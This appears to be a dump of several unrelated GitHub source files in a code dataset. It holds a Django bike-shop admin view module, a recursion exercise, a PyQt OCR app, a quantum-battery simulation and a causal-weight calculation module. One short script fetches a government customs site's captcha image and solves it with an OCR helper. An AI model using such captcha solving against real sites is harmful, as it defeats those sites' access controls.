messages.warning(request,\"Product already exist\")\n return redirect(\"addproduct\")\n\n\n newproduct = product(company = company, model = model, wheel_size = wheel_size, suspention = suspention, internal_cabling = internal_cabling, bike_type = bike_type, gender_cat = gender_cat)\n newproduct.save()\n newdescription = product_description(product_id = newproduct, terrain_description = terrain_description, strength_description = strength_description, perfomance_description = perfomance_description, precision_description = precision_description)\n newdescription.save()\n\n messages.info(request,\"New Product added successfully\")\n return redirect(\"addproduct\") \n\n\n\n\ndef cycloneadmin_editproduct(request,product_id):\n\n if request.method == 'POST':\n \n # fetch the info from user edit request\n company = request.POST['company']\n model = request.POST['model']\n wheel_size = request.POST['wheel_size']\n suspention = request.POST['suspention']\n internal_cabling = request.POST['internal_cabling']\n bike_type = request.POST['bike_type']\n gender_cat = request.POST['gender_cat']\n terrain_description = request.POST['terrain_description']\n strength_description = request.POST['strength_description']\n perfomance_description = request.POST['perfomance_description']\n precision_description = request.POST['precision_description']\n \n # update all the information , not a good practce\n # only update changed fields only using ajax\n product.objects.filter(product_id = product_id).update(company = company, model = model, wheel_size = wheel_size, suspention = suspention, internal_cabling = internal_cabling, bike_type = bike_type, gender_cat = gender_cat)\n product_description.objects.filter(product_id = product_id).update(terrain_description = terrain_description, strength_description = strength_description, perfomance_description = perfomance_description, precision_description = precision_description)\n print(\"data updated\")\n return redirect(\"products\")\n\n # using product is fetch data and pass to the html to edit\n products = product.objects.select_related(\"product_id\").values(\"company\",\"model\",\"wheel_size\",\"suspention\",\"internal_cabling\",\"bike_type\",\"gender_cat\",\"product_description__terrain_description\",\"product_description__strength_description\",\"product_description__perfomance_description\",\"product_description__precision_description\").get(product_id = product_id)\n return render(request,'cycloneadmin_editproduct.html',{\"products\":products})\n\nclass cycloneadmin_coupenmanagemant(View):\n\n def get(self, request):\n coupens = discount_coupen.objects.values(\"coupen_no\",\"coupen_type\",\"discount\",\"expiry_date\")\n return render(request,'cycloneadmin_coupen_managemant.html',{'coupens':coupens})\n\n\n\nclass cycloneadmin_offer_management(View):\n \n def get(self, request):\n\n offer_list = product_category.objects.filter(is_discounted = True).values('product_id__company','product_id__model','mrp','seller_price')\n \n return render(request, 'cycloneadmin_offer_management.html',{\"offer_list\":offer_list})\n\n\nclass cycloneadmin_add_offer(View):\n\n def post(self, request):\n \"\"\"\n if the offer model is none it means we have to put offer\n to the all models in that product. else that specific products only\n \"\"\"\n\n offer_company = request.POST['offer_company']\n offer_model = request.POST['offer_model']\n offer_price = request.POST['offer_price']\n print('request hit')\n # if offer for specific products\n if offer_model:\n\n new_offer_item = product_category.objects.filter(product_id__company = offer_company, product_id__model = offer_model)\n # if the product not found\n if len(new_offer_item ) == 0 :\n return JsonResponse({'status':404,'message':'product not found'})\n\n \n return JsonResponse({'status':200,'message':'products added to offer category'})\n \n # offer for all model in the product\n else:\n pass\n\n\n \n\n\nclass cyclone_addcoupen(View):\n \n # admin coupen add request\n def post(self, request):\n print(\"add coupen request\")\n\n # fetching coupen data from ajax post request\n coupen_no = request.POST['coupen_no']\n coupen_type = request.POST['coupen_type']\n coupen_discount = request.POST['coupen_discount']\n coupen_expiry_date = request.POST['coupen_expiry_date']\n\n # checking the coupen already exixt or not\n if discount_coupen.objects.filter(coupen_no = coupen_no).exists():\n return JsonResponse({'status':409, 'message':'coupen already exist'}) \n\n # updating data base\n new_coupen = discount_coupen(coupen_no = coupen_no,coupen_type = coupen_type,discount = coupen_discount, expiry_date = coupen_expiry_date)\n new_coupen.save()\n\n return JsonResponse({'status':200, 'message':'coupen updated'})\n\n\n# delete coupen\nclass cycloneadmin_deletecoupen(View):\n \n def post(self, request):\n coupen_no = request.POST['coupen_no']\n discount_coupen.objects.get(coupen_no = coupen_no).delete()\n return JsonResponse({'status':200,'message':'coupen removed successfully'})\n\n\n\n# dicontinue or continue product/ all categories\n\nclass cycloneadmin_discontinuproduct(View):\n\n def get(self,request):\n print('didcontinue hit')\n \"\"\"\n when a product need to be discontinued we have to set is_discontinue\n filds of every category of the pericular product as True\n \"\"\"\n\n product_id = request.GET['product_id']\n product_dis_continue = product.objects.get(product_id = product_id)\n product_category.objects.filter(product_id = product_dis_continue).update(is_discontinued = True)\n return JsonResponse({'status':200,'message':'product discontinued'})\n\n\nclass cycloneadmin_order_updation(View):\n\n def get(self, request):\n order_no = request.GET['order_no']\n order = user_order.objects.get(order_no = order_no)\n \n return JsonResponse({\"status\":200,\"order_no\":order.order_no,\"payment_method\":order.payment_method,\"payment_status\":order.payment_status,\"order_status\":order.order_status,'email':order.email.email,'order_date':order.order_date})\n\n\n def post(self, request):\n order_no = request.POST['order_no']\n update_val = request.POST['update_val']\n print(update_val)\n try:\n user_order.objects.filter(order_no = order_no).update(order_status = update_val)\n except Exception:\n return JsonResponse({'status':404,'message':'updation filed'})\n return JsonResponse({'status':200,'message':'status updaed'})\n\nclass cycloneadmin_cancel_order(View):\n\n def post(self, request):\n order_no = request.POST['order_no']\n try:\n user_order.objects.filter(order_no = order_no).update(order_status = \"cancelled by admin\")\n except Exception:\n return JsonResponse({'status':404, 'messages':'cancelation filed'})\n\n return JsonResponse({'status':200, 'messages':'order cancelled'})\n\n\nclass cycloneadmin_report_generator(View):\n \n def get(self,request):\n\n # this returning sales report to admin\n from_date = request.GET['from_date']\n to_date = request.GET['to_date']\n\n total_shipments = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).count()\n total_business = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).aggregate(Sum('payment_amount'))['payment_amount__sum']\n total_cod_order = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Cash on delivery(COD)\").count()\n total_payed_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Net banking / UPI\").count()\n canceled_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,order_status = \"order canceled\").count()\n total_users = CustomUser.objects.count() - 1\n total_product_quantity = product_category.objects.aggregate(Sum(\"quantity\"))['quantity__sum']\n \n report = {\"total_shipments\":total_shipments,\"total_business\":total_business,\"total_cod_order\":total_cod_order,\"total_payed_orders\":total_payed_orders,\"canceled_orders\":canceled_orders,\"total_users\":total_users,\"total_product_quantity\":total_product_quantity}\n return JsonResponse({'status':200,\"report\":report})\n\n\nclass pdf_report_downloader(View):\n\n def get(self, request):\n\n # fetching data from the url\n from_date = request.GET['from_date']\n to_date = request.GET['to_date']\n\n # fetching data from data base by filtering with the date range\n total_shipments = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).count()\n total_business = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).aggregate(Sum('payment_amount'))['payment_amount__sum']\n total_cod_order = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Cash on delivery(COD)\").count()\n total_payed_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Net banking / UPI\").count()\n canceled_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,order_status = \"order canceled\").count()\n total_users = CustomUser.objects.count() - 1\n total_product_quantity = product_category.objects.aggregate(Sum(\"quantity\"))['quantity__sum']\n \n buffer = io.BytesIO()\n pdf = canvas.Canvas(buffer, pagesize=letter, bottomup=0)\n \n textobj = pdf.beginText()\n textobj.setTextOrigin(inch,inch)\n \n lines= [\n \"total shipments :\"+str(total_shipments),\n \"total business :\"+str(total_business),\n \"total cod order :\"+str(total_cod_order),\n \"total payed orders :\"+str(total_payed_orders),\n \"canceled orders :\"+str(canceled_orders),\n \"total users :\"+str(total_users),\n \"total product quantity :\"+str(total_product_quantity)\n ]\n\n for line in lines:\n textobj.textLine(line)\n \n pdf.drawText(textobj)\n pdf.showPage()\n pdf.save()\n buffer.seek(0)\n return FileResponse(buffer, as_attachment=True, filename=\"report.pdf\")\n\n \nclass csv_report_downloader(View):\n \n def get(self, request):\n \n # fetching data from the url\n from_date = request.GET['from_date']\n to_date = request.GET['to_date']\n\n # fetching data from data base by filtering with the date range\n total_shipments = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).count()\n total_business = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).aggregate(Sum('payment_amount'))['payment_amount__sum']\n total_cod_order = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Cash on delivery(COD)\").count()\n total_payed_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Net banking / UPI\").count()\n canceled_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,order_status = \"order canceled\").count()\n total_users = CustomUser.objects.count() - 1\n total_product_quantity = product_category.objects.aggregate(Sum(\"quantity\"))['quantity__sum']\n \n # Create the HttpResponse object with the appropriate CSV header.\n response = HttpResponse(\n content_type=\"text/csv\",\n headers={\"Content-Disposition\": 'attachment; filename=\"report.csv\"'},\n )\n\n # write contents to the csv file\n writer = csv.writer(response)\n writer.writerow([\"total_shipments\",total_shipments])\n writer.writerow([\"total_business\",total_business])\n writer.writerow([\"total_cod_order\",total_cod_order])\n writer.writerow([\"total_payed_orders\",total_payed_orders])\n writer.writerow([\"canceled_orders\",canceled_orders])\n writer.writerow([\"total_users\",total_users])\n writer.writerow([\"total_product_quantity\",total_product_quantity])\n\n return response\n\n \n\n","repo_name":"Rashicom/cyclone_ecom","sub_path":"cycloneadmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26198016883","text":"# needs revisit, only distinct combinations is displayed\ndef recursion(n, used):\n def solution(idx, n, used, ans=[], res=[]):\n if n == 0:\n res.append(ans)\n return \n \n if idx > n:\n return\n \n if not used[idx]:\n used[idx] = True\n solution(idx+1, n - idx, used, ans +[idx], res)\n for i in range(idx, n+1):\n if not used[i]:\n used[i] = True\n solution(idx+1, n - i, used, ans + [i], res)\n used[i] = False\n used[idx] = False\n \n return res \n return solution(1, n, used)\n\nn = 5\nused = [False]*(n+1)\nprint(recursion(n, used)) # [[1,4], [3,2],[5]]\n\n\n# Method 2 - prints all combinations\n\ndef recursion(idx, n, tgt, ans=[], res=[]):\n if idx > n or tgt < 0:\n return\n\n if tgt == 0:\n if ans not in res:\n res.append(ans)\n return\n\n for i in range(idx, n+1):\n recursion(i + 1, n, tgt-i, ans + [i], res)\n recursion(i, n, tgt - i, ans + [i], res)\n\n return res\n\n\nn = 5\nprint(recursion(1, n, n))","repo_name":"srihariprasad-r/workable-code","sub_path":"Practice problems/foundation/recursion/print_all_combinations_of_n.py","file_name":"print_all_combinations_of_n.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14451486278","text":"import sys\r\nimport os\r\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QMainWindow, QPushButton, QFileDialog, QWidget, QCheckBox, QHBoxLayout\r\n\r\n# User defined imports\r\nfrom OCR_reader import OCRReader\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.image_path = None\r\n self.display_bg = True\r\n self.display_image = True\r\n\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setWindowTitle(\"OCR Reader\")\r\n\r\n bg_box = QCheckBox(\"Display Background\")\r\n bg_box.setChecked(True)\r\n bg_box.stateChanged.connect(lambda: self.bg_state(bg_box))\r\n image_box = QCheckBox(\"Display Image\")\r\n image_box.setChecked(True)\r\n image_box.stateChanged.connect(lambda: self.image_state(image_box))\r\n upload_button = QPushButton(\"Upload Image\", self)\r\n upload_button.clicked.connect(self.upload_image)\r\n reconvert_button = QPushButton(\"Re-Convert\", self)\r\n reconvert_button.clicked.connect(self.convert_image_to_text)\r\n\r\n widget = QWidget()\r\n h_layout = QHBoxLayout()\r\n h_layout.addStretch(1)\r\n h_layout.addWidget(bg_box)\r\n h_layout.addWidget(image_box)\r\n\r\n v_layout = QVBoxLayout()\r\n v_layout.addStretch(1)\r\n v_layout.addLayout(h_layout)\r\n v_layout.addWidget(upload_button)\r\n v_layout.addWidget(reconvert_button)\r\n widget.setLayout(v_layout)\r\n self.setCentralWidget(widget)\r\n\r\n def upload_image(self):\r\n image_path, _ = QFileDialog.getOpenFileName(self, \"Select image\", os.getenv(\"HOME\"), \"(*.png *.xpm .jpg)\")\r\n if image_path != \"\":\r\n self.image_path = image_path\r\n self.convert_image_to_text()\r\n\r\n def convert_image_to_text(self):\r\n if self.image_path is not None:\r\n OCRReader(self.image_path, self.display_bg, self.display_image)\r\n else:\r\n print(\"Please select an image file first!\")\r\n\r\n def bg_state(self, button):\r\n self.display_bg = True if button.isChecked() else False\r\n\r\n def image_state(self, button):\r\n self.display_image = True if button.isChecked() else False\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ocr_app = QApplication(sys.argv)\r\n ocr_app.setStyle(\"Fusion\")\r\n gui = MainWindow()\r\n gui.show()\r\n sys.exit(ocr_app.exec_())\r\n","repo_name":"Pramod07Ch/GUI-image-to-text-convertor","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"24431138919","text":"# -*- coding: utf-8 -*-\n\"\"\"\n *Author:\t\t\t王成杰\n *Filename:\t\t\tFig4-Entanglement-Coherence-and-charging-process-of-QB\n *Date:\t\t\t2023-08-22 12:44:11\n *Description:复现Fig4,这个Fig4是一个两变量函数\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n\n\ndef calculate_cq(rho, *alpha):\n \"\"\"\n 计算C0,Q\n \"\"\"\n a_uu, a_ud, a_du, a_dd = alpha\n c = (np.sum(np.abs(rho)) - np.trace(np.abs(rho))) / 3\n\n q = 2 * np.abs(a_uu * a_dd - a_ud * a_du)\n return c, q\n\n\ndef calculate(J,triangle):\n \"\"\"\n 计算E,P,C0,Q的平均值\n \"\"\"\n # ================== 初始化\n Omega = 1 # 表征外驱动场的驱动能力\n hbar = 1 # 自然单位,\n omega0 = 1 # 原子自己的震动频率\n t_min = np.pi / Omega / 2\n t = np.linspace(0,t_min,1000)\n t_delta = t[1] - t[0]\n alpha = J * (triangle - 1) # 1\n beta = np.sqrt(J ** 2 * (triangle - 1) ** 2 + 4 * Omega ** 2) # 2\n gamma1 = 2 * Omega / np.sqrt(2 * (alpha + beta) ** 2 + 8 * Omega ** 2) # 0.5\n gamma2 = (alpha + beta) / np.sqrt(2 * (alpha + beta) ** 2 + 8 * Omega ** 2) # 0.5\n E_max=4*omega0*hbar\n P_max = E_max*Omega\n E = np.ones_like(t) # 体系能量\n C0 = np.ones_like(E) # 体系相关度\n Q = np.ones_like(E) # 体系纠缠度\n\n # 单自旋的本征态\n up = np.array([[1], [0]])\n down = np.array([[0], [1]])\n # 两个粒子的本征态耦合\n uu = np.kron(up, up)\n ud = np.kron(up, down)\n dd = np.kron(down, down)\n du = np.kron(down, up)\n # 体系自由哈密顿量的矩阵表达形式\n H0 = 2 * hbar * omega0 * np.dot(uu, uu.T) + hbar * omega0 * np.dot(ud, ud.T) \\\n - hbar * omega0 * np.dot(du, du.T) - 2 * hbar * omega0 * np.dot(dd, dd.T)\n # 初始化本征态\n E1_s = (dd - uu) / np.sqrt(2) # 负根号二 0 0 根号二\n E2_s = (du - ud) / np.sqrt(2) # 0 负根号二 根号二 0\n E3_s = gamma1 * (dd + uu) - gamma2 * (du + ud) # 0.5 -0.5 -0.5 0.5\n E4_s = gamma2 * (dd + uu) + gamma1 * (du + ud) # 0.5 0.5 0.5 0.5\n\n # 初始化本征能量\n E1 = hbar * triangle * J # 1\n E2 = -hbar * (triangle + 2) * J # -3\n E3 = hbar * (J - beta) # -1\n E4 = hbar * (J + beta) # 3\n\n # =======================计算体系随时间的演化===================\n # 体系初态为 dd,那么我们需要在H的表象下写出初态就需要知道每个态上的系数\n c1 = np.dot(E1_s.T, dd) # 根号二分之一\n c2 = np.dot(E2_s.T, dd) # 0\n c3 = np.dot(E3_s.T, dd) # 0.5\n c4 = np.dot(E4_s.T, dd) # 0.5\n # 体系态矢随时间的演化\n Psi_t = c1 * np.kron(np.exp(-1j / hbar * E1 * t), E1_s) + c2 * np.kron(np.exp(-1j / hbar * E2 * t), E2_s) + \\\n c3 * np.kron(np.exp(-1j / hbar * E3 * t), E3_s) + c4 * np.kron(np.exp(-1j / hbar * E4 * t), E4_s)\n\n for i in range(1000):\n rho = np.dot(Psi_t[:,i].reshape(4,1),np.conj(Psi_t[:,i]).reshape(1,4))\n E[i] = np.trace(np.dot(rho,H0)) + 2*hbar*omega0\n alpha_uu = np.dot(uu.T, Psi_t[:, i])\n alpha_ud = np.dot(ud.T, Psi_t[:, i])\n alpha_du = np.dot(du.T, Psi_t[:, i])\n alpha_dd = np.dot(dd.T, Psi_t[:, i])\n C0[i],Q[i] = calculate_cq(\n rho,\n alpha_uu,\n alpha_ud,\n alpha_du,\n alpha_dd\n )\n \n P = np.diff(E) / t_delta / P_max\n E = E / E_max\n\n E_ave,P_ave,C0_ave,Q_ave = calculate_ave(E,P,Q,C0,t_min,t_delta)\n return E_ave,P_ave,C0_ave,Q_ave\n\ndef calculate_ave(E,P,Q,C0,t_min,t_delta):\n E_ave = E[-1]\n P_ave = np.sum(P) / t_min * t_delta\n C0_ave = np.sum(C0) / t_min * t_delta\n Q_ave = np.sum(Q)/t_min * t_delta\n return E_ave,P_ave,C0_ave,Q_ave\n\ndef draw(E,P,Q,C0,triangle,J):\n \"\"\"\n 绘制三维图像\n \"\"\"\n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf = ax.plot_surface(triangle,np.log10(J),E, cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$W_{fin}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# \n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf = ax.plot_surface(triangle,np.log10(J),P,cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$\\\\bar{P}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# \n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf= ax.plot_surface(triangle,np.log10(J),Q, cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$\\\\bar{Q}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# \n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf = ax.plot_surface(triangle,np.log10(J),C0, cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$\\\\bar{C}_{0}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n \n plt.show()\n\n\n\n\ndef main():\n \"\"\"\n 计算E,P,C0,Q的平均值作为triangle和log(J/Omega)的函数\n \"\"\"\n Jn = 100\n tn = 5\n J = np.linspace(0.1,10,Jn)\n triangle = np.linspace(-1,1,tn)\n J_s,t_s = np.meshgrid(J,triangle)\n E = np.ones_like(J_s)\n P = np.ones_like(J_s)\n C0 = np.ones_like(J_s)\n Q = np.ones_like(J_s)\n # calculate(0,1)\n for i in range(tn):\n for j in range(Jn):\n E[i,j],P[i,j],C0[i,j],Q[i,j] = calculate(J_s[i,j],t_s[i,j])\n print('i={},j={}'.format(i,j))\n draw(E,P,Q,C0,t_s,J_s)\n\n\n \nif __name__==\"__main__\":\n main()","repo_name":"1024Person/Quatum-Battery","sub_path":"Fig4-Entanglement-Coherence-and-charging-process-of-QB.py","file_name":"Fig4-Entanglement-Coherence-and-charging-process-of-QB.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71839636730","text":"# !/usr/bin/python3\n# -*-coding:utf-8-*-\n# Author: zhou jun wei\n# CreatDate: 2021/12/3 13:14\n\n# from setup import author, version\n# print('name: {}, version {}'.format(\"zjw\", \"0.0.1\"))\n\nfrom zjwocr.ocr import ocr_api\nimport requests, time\nimport torch, io\nfrom PIL import Image\n\nurl = 'http://credit.customs.gov.cn/ccppserver/verifyCode/creator?{}'.format(int(time.time() * 1000))\nresp = requests.get(url, headers={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'\n}, verify=False, timeout=10)\ncheckCode = ocr_api({'图片': resp.content,'网站': '中国海关企业进出口信用信息公示平台'})\n\nim = Image.open(io.BytesIO(resp.content))\nim.seek(8)\nimg_byte = io.BytesIO()\nim.save(img_byte, format='PNG')\nbinary_content = img_byte.getvalue()\nwith open('{}.png'.format(checkCode[\"code\"]), \"wb\") as lk:\n lk.write(binary_content)\nprint(checkCode)","repo_name":"zjw505104341/ocrimg","sub_path":"zjwocr/models_test/credit_customs_gov_cn_test.py","file_name":"credit_customs_gov_cn_test.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"19147793257","text":"# -*- coding: utf-8 -*-\n\"\"\"Calculates weight and auxilliary data for each causevar and writes to files.\n\nAll weight data file output writers are now called at this level, making the\nprocess interruption tolerant up to a single causevar analysis.\n\n\"\"\"\n\nimport csv\nimport logging\nimport os\nfrom functools import partial\n\nimport numpy as np\nimport pathos\nfrom pathos.multiprocessing import ProcessingPool as Pool\n\n\ndef writecsv_weightcalc(filename, datalines, header):\n \"\"\"CSV writer customized for writing weights.\"\"\"\n\n with open(filename, \"w\", newline=\"\") as f:\n csv.writer(f).writerow(header)\n csv.writer(f).writerows(datalines)\n\n\ndef readcsv_weightcalc(filename):\n \"\"\"CSV reader customized for reading weights.\"\"\"\n\n with open(filename) as f:\n header = next(csv.reader(f))[:]\n values = np.genfromtxt(f, delimiter=\",\", dtype=str)\n\n return values, header\n\n\ndef calc_weights_oneset(\n weightcalcdata,\n weightcalculator,\n box,\n startindex,\n size,\n newconnectionmatrix,\n method,\n boxindex,\n filename,\n headerline,\n writeoutput,\n causevarindex,\n):\n\n causevar = weightcalcdata.variables[causevarindex]\n\n print(\n \"Start analysing causal variable: \"\n + causevar\n + \" [\"\n + str(causevarindex + 1)\n + \"/\"\n + str(len(weightcalcdata.causevarindexes))\n + \"]\"\n )\n\n directional_name = \"weights_directional\"\n absolute_name = \"weights_absolute\"\n neutral_name = \"weights\"\n\n mis_directional_name = \"mis_directional\"\n mis_absolute_name = \"mis_absolute\"\n mis_neutral_name = \"mis\"\n\n auxdirectional_name = \"auxdata_directional\"\n auxabsolute_name = \"auxdata_absolute\"\n auxneutral_name = \"auxdata\"\n\n # Provide names for the significance threshold file types\n if weightcalcdata.allthresh:\n sig_directional_name = \"sigthresh_directional\"\n sig_absolute_name = \"sigthresh_absolute\"\n sig_neutral_name = \"sigthresh\"\n\n # Initiate datalines with delays\n datalines_directional = np.asarray(weightcalcdata.actual_delays)\n datalines_directional = datalines_directional[:, np.newaxis]\n datalines_absolute = datalines_directional.copy()\n datalines_neutral = datalines_directional.copy()\n\n # Datalines needed to store mutual information\n mis_datalines_directional = datalines_directional.copy()\n mis_datalines_absolute = datalines_directional.copy()\n mis_datalines_neutral = datalines_directional.copy()\n\n # Datalines needed to store significance threshold values\n # for each variable combination\n datalines_sigthresh_directional = datalines_directional.copy()\n datalines_sigthresh_absolute = datalines_directional.copy()\n datalines_sigthresh_neutral = datalines_directional.copy()\n\n # Initiate empty auxdata lists\n auxdata_directional = []\n auxdata_absolute = []\n auxdata_neutral = []\n\n if method[:16] == \"transfer_entropy\":\n if os.path.exists(\n filename(auxdirectional_name, boxindex + 1, causevar)\n ):\n auxdata_directional = list(\n np.genfromtxt(\n filename(auxdirectional_name, boxindex + 1, causevar),\n delimiter=\",\",\n dtype=str,\n )[1:, :]\n )\n auxdata_absolute = list(\n np.genfromtxt(\n filename(auxdirectional_name, boxindex + 1, causevar),\n delimiter=\",\",\n dtype=str,\n )[1:, :]\n )\n\n datalines_directional, _ = readcsv_weightcalc(\n filename(directional_name, boxindex + 1, causevar)\n )\n\n datalines_absolute, _ = readcsv_weightcalc(\n filename(absolute_name, boxindex + 1, causevar)\n )\n\n mis_datalines_directional, _ = readcsv_weightcalc(\n filename(mis_directional_name, boxindex + 1, causevar)\n )\n\n mis_datalines_absolute, _ = readcsv_weightcalc(\n filename(mis_absolute_name, boxindex + 1, causevar)\n )\n\n if weightcalcdata.allthresh:\n datalines_sigthresh_directional = readcsv_weightcalc(\n filename(sig_directional_name, boxindex + 1, causevar)\n )\n datalines_sigthresh_absolute = readcsv_weightcalc(\n filename(sig_absolute_name, boxindex + 1, causevar)\n )\n\n for affectedvarindex in weightcalcdata.affectedvarindexes:\n affectedvar = weightcalcdata.variables[affectedvarindex]\n\n logging.info(\n \"Analysing effect of: \"\n + causevar\n + \" on \"\n + affectedvar\n + \" for box number: \"\n + str(boxindex + 1)\n )\n\n exists = False\n do_test = not (\n newconnectionmatrix[affectedvarindex, causevarindex] == 0\n )\n # Test if the affectedvar has already been calculated\n if (method[:16] == \"transfer_entropy\") and do_test:\n testlocation = filename(\n auxdirectional_name, boxindex + 1, causevar\n )\n if os.path.exists(testlocation):\n # Open CSV file and read names of second affected vars\n auxdatafile = np.genfromtxt(\n testlocation,\n delimiter=\",\",\n usecols=np.arange(0, 2),\n dtype=str,\n )\n affectedvars = auxdatafile[:, 1]\n if affectedvar in affectedvars:\n print(\"Affected variable results in existence\")\n exists = True\n\n if do_test and (exists is False):\n weightlist = []\n directional_weightlist = []\n absolute_weightlist = []\n sigthreshlist = []\n directional_sigthreshlist = []\n absolute_sigthreshlist = []\n sigfwd_list = []\n sigbwd_list = []\n propfwd_list = []\n propbwd_list = []\n mifwd_list = []\n mibwd_list = []\n\n for delay in weightcalcdata.sample_delays:\n logging.info(\"Now testing delay: \" + str(delay))\n\n causevardata = box[:, causevarindex][\n startindex : startindex + size\n ]\n\n affectedvardata = box[:, affectedvarindex][\n startindex + delay : startindex + size + delay\n ]\n\n weight, auxdata = weightcalculator.calcweight(\n causevardata,\n affectedvardata,\n weightcalcdata,\n causevarindex,\n affectedvarindex,\n )\n\n # Calculate significance thresholds at each data point\n if weightcalcdata.allthresh:\n sigthreshold = weightcalculator.calcsigthresh(\n weightcalcdata, affectedvar, causevar, box, delay\n )\n\n if len(weight) > 1:\n # If weight contains directional as well as\n # absolute weights, write to separate lists\n directional_weightlist.append(weight[0])\n absolute_weightlist.append(weight[1])\n # Same approach with significance thresholds\n if weightcalcdata.allthresh:\n directional_sigthreshlist.append(sigthreshold[0])\n absolute_sigthreshlist.append(sigthreshold[1])\n\n else:\n weightlist.append(weight[0])\n if weightcalcdata.allthresh:\n sigthreshlist.append(sigthreshold[0])\n\n if auxdata is not None:\n if len(auxdata) > 1:\n # This means we have auxdata for both the forward and\n # backward calculation\n [auxdata_fwd, auxdata_bwd] = auxdata\n [\n significance_fwd,\n properties_fwd,\n mi_fwd,\n ] = auxdata_fwd # mi_fwd and mi_bwd should be the same\n [\n significance_bwd,\n properties_bwd,\n mi_bwd,\n ] = auxdata_bwd\n sigfwd_list.append(significance_fwd)\n sigbwd_list.append(significance_bwd)\n propfwd_list.append(properties_fwd)\n propbwd_list.append(properties_bwd)\n mifwd_list.append(mi_fwd)\n mibwd_list.append(mi_bwd)\n\n if len(weight) > 1:\n\n twodimensions = True\n\n proplist = [propfwd_list, propbwd_list]\n milist = [mifwd_list, mibwd_list]\n siglist = [sigfwd_list, sigbwd_list]\n weightlist = [directional_weightlist, absolute_weightlist]\n\n # Combine weight data\n weights_thisvar_directional = np.asarray(weightlist[0])\n weights_thisvar_directional = weights_thisvar_directional[\n :, np.newaxis\n ]\n\n mis_thisvar_directional = np.asarray(milist[0])\n mis_thisvar_directional = mis_thisvar_directional[\n :, np.newaxis\n ]\n\n datalines_directional = np.concatenate(\n (datalines_directional, weights_thisvar_directional),\n axis=1,\n )\n\n mis_datalines_directional = np.concatenate(\n (mis_datalines_directional, mis_thisvar_directional),\n axis=1,\n )\n\n weights_thisvar_absolute = np.asarray(weightlist[1])\n weights_thisvar_absolute = weights_thisvar_absolute[\n :, np.newaxis\n ]\n\n mis_thisvar_absolute = np.asarray(milist[1])\n mis_thisvar_absolute = mis_thisvar_absolute[:, np.newaxis]\n\n datalines_absolute = np.concatenate(\n (datalines_absolute, weights_thisvar_absolute), axis=1\n )\n\n mis_datalines_absolute = np.concatenate(\n (mis_datalines_absolute, 